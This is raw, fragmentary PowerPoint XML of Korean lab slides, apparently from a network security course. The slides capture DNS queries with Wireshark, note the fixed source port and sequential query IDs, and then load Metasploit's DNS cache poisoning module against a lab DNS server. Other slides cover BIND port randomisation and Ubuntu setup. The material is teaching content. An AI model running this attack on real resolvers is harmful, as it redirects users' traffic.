      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="393405717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wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 캡처한 패킷들 중 로컬 네트워크의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(10.0.2.6)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 보낸 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의들</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(queries)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>www.navy.ac.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의 패킷</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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>소스 포트는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>33333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ www.navy.ac.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xb8a1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>는 바뀔 수 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</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 name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE680142-7F58-42C6-9B8F-5CB4311B8A6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1488401453"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="536439" y="529780"/>
          <a:ext cx="5328158" cy="4394200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="415428346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FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>참고</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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04251996"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3989959">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-175260" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>※ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>칼리 리눅스의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>DNS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>서버 주소를 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>10.10.1.14(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>공격 대상 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>DNS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>서버</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>로 설정하면 웹 브라우저를 통해서도 확인 가능</a:t>
                      </a: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3276630"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="_x199974960">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{037F0F4E-FE9F-4E9A-9A9F-26FD274689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3499" y="1426246"/>
            <a:ext cx="4062413" cy="1530350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9217" name="_x199978400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D1A59FE-E102-42CE-BDF0-606AA97182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9311" y="3107644"/>
            <a:ext cx="4062413" cy="1665288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9220" name="_x197188112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3C2799A-7CC5-4CAF-8175-B8D374BC7A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4886" y="1132703"/>
            <a:ext cx="5400675" cy="1887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57274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 www.navy.mil.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의 패킷</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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 소스 포트는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>33333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ www.navy.mil.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>0xb8bf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    ➡ 로컬 네트워크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 보내는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 순차적으로 증가</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    ➡ 로컬 네트워크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>캐시 오염 공격에 취약함</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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>캐시 오염 공격을 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>캐시 오염 공격 모듈 사용</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; use auxiliary/spoof/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>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41" name="_x197188352">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E07DB87-EE7B-43FC-8A39-69DD32363B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7859"/>
            <a:ext cx="5400675" cy="18954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표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCDD0D74-68F9-436E-95DA-A938F7A60601}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2433329681"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="500180" y="3748510"/>
          <a:ext cx="5328158" cy="1224026"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3599208759"/>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FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>참고</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2379462"/>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질의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순차적으로 증가하는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1980~90</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>년대에 사용되었던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BIND4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>임</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="165100" marR="0" indent="-16510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1990~2000</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>년대에 사용되었던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BIND8</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섞어서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(shuffle)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사용하거나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풀을 사용하는 옵션만 제공</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주로 사용되고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BIND9</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풀 사용만 가능</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4181591"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5B04E0F-AB60-49B8-AD10-9ED6EDF20664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326415" y="768651"/>
            <a:ext cx="5321990" cy="2565258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76372707-B768-45DA-B4F0-1A727B8B4B58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326415" y="4196565"/>
            <a:ext cx="3923308" cy="416255"/>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3058862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cyber_environment.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 파일을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>열어서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>모든 내용을 복사한다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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번 작업을 통해 관리자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>CMD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 켜서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번의 내용을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>붙혀넣는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>시간 다소 소요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>6. Username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 입력하라는 메시지가 출력된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>새로 설치할 우분투의 사용자명과 비밀번호를 여기서 설정하면 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>기존 윈도우의 계정이름</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>비밀번호와 똑같이 할 필요는 없다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>기억하기 어려우면 똑같이 해도 됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정이 완료되면 이 창을 닫고</a:t>
            </a:r>
            <a:r>
